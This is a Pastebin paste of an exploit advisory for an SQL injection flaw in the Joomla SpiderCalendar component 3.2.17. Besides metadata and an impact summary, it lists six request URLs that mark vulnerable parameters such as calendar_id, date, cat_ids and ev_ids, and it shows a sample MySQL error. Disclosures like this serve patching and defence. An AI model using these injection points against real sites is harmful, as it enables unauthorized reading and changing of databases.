KingSkrupellos

Joomla SpiderCalendar Components 3.2.17 SQL Injection

Feb 24th, 2019
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.85 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla SpiderCalendar Components 3.2.17 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/02/2019
  7. # Vendor Homepage : web-dorado.com
  8. # Software Download Link : web-dorado.com/products/joomla-calendar.html
  9. # Software Information Link : extensions.joomla.org/extension/spider-calendar/
  10. # Software Affected Versions : 3.2.6 and 3.2.17 / All Previous Versions
  11. # Software Price Type : Paid Download ~ 20$ - 30$ - 40$
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. Spider Calendar is one of the best event calendars available in JED. Spider Calendar is a
  26.  
  27. highly configurable responsive extension which allows you to have multiple organized
  28.  
  29. events in a calendar. If you have problem with organizing your events and displaying
  30.  
  31. them in a calendar format, then Spider Calendar is the best solution
  32.  
  33. ####################################################################
  34.  
  35. # Impact :
  36. ***********
  37. Joomla SpiderCalendar 3.2.17 [ and other versions ] component for Joomla is prone
  38.  
  39. to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  40.  
  41. data before using it in an SQL query. Exploiting this issue could allow an attacker
  42.  
  43. to compromise the application, access or modify data, or exploit latent vulnerabilities
  44.  
  45. in the underlying database. A remote attacker can send a specially crafted request
  46.  
  47. to the vulnerable application and execute arbitrary SQL commands in application`s database.
  48.  
  49. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  50.  
  51. An attacker can exploit this issue using a browser.
  52.  
  53. ####################################################################
  54.  
  55. # SQL Injection Exploit :
  56. **********************
  57. /index.php?option=com_spidercalendar&calendar_id=[SQL Injection]
  58.  
  59. /index.php?option=com_spidercalendar&date=[SQL Injection]
  60.  
  61. /index.php?option=com_spidercalendar&view=bigcalendarweek&def_view=list&views=&rand=[ID-NUMBER]&theme_id=[ID-NUMBER]&calendar=[ID-NUMBER]&cat_id=&cat_ids=&format=row&tmpl=component&Itemid=[SQL Injection]
  62.  
  63. /index.php?option=com_spidercalendar&view=spidercalendarbig_seemore&theme_id=[ID-NUMBER]&ev_ids=&calendar_id=[ID-NUMBER]&date=[YEAR]-[MONTH]-[DAY]&cat_id=&cat_ids=[SQL Injection]&tmpl=component
  64.  
  65. /index.php?option=com_spidercalendar&view=spidercalendarbig&theme_id=[ID-NUMBER]&calendar_id=[ID-NUMBER]&eventID=[ID-NUMBER]&date=[YEAR]-[MONTH]-[DAY]&day=[ID-NUMBER]&ev_ids=[SQL Injection]&tmpl=component
  66.  
  67. /index.php?option=com_spidercalendar&view=bigcalendarweek&def_view=list&views=&rand=[ID-NUMBER]&theme_id=[ID-NUMBER]&calendar=[ID-NUMBER]&cat_id=&cat_ids=&format=row&tmpl=component&Itemid=[ID-NUMBER]&months=[YEAR]-[MONTH]-[DAY]&date=[YEAR]-[MONTH]-[DAY][SQL Injection]
  68.  
  69. ####################################################################
  70.  
  71. # Example SQL Database Error :
  72. ****************************
  73. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your
  74. MySQL server version for the right syntax to use near ')' at line 2 SQL=SELECT *
  75. FROM fx5md_spidercalendar_event where calendar=1 AND id IN ()
  76.  
  77. ####################################################################
  78.  
  79. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  80.  
  81. ####################################################################
Add Comment
Please, Sign In to add comment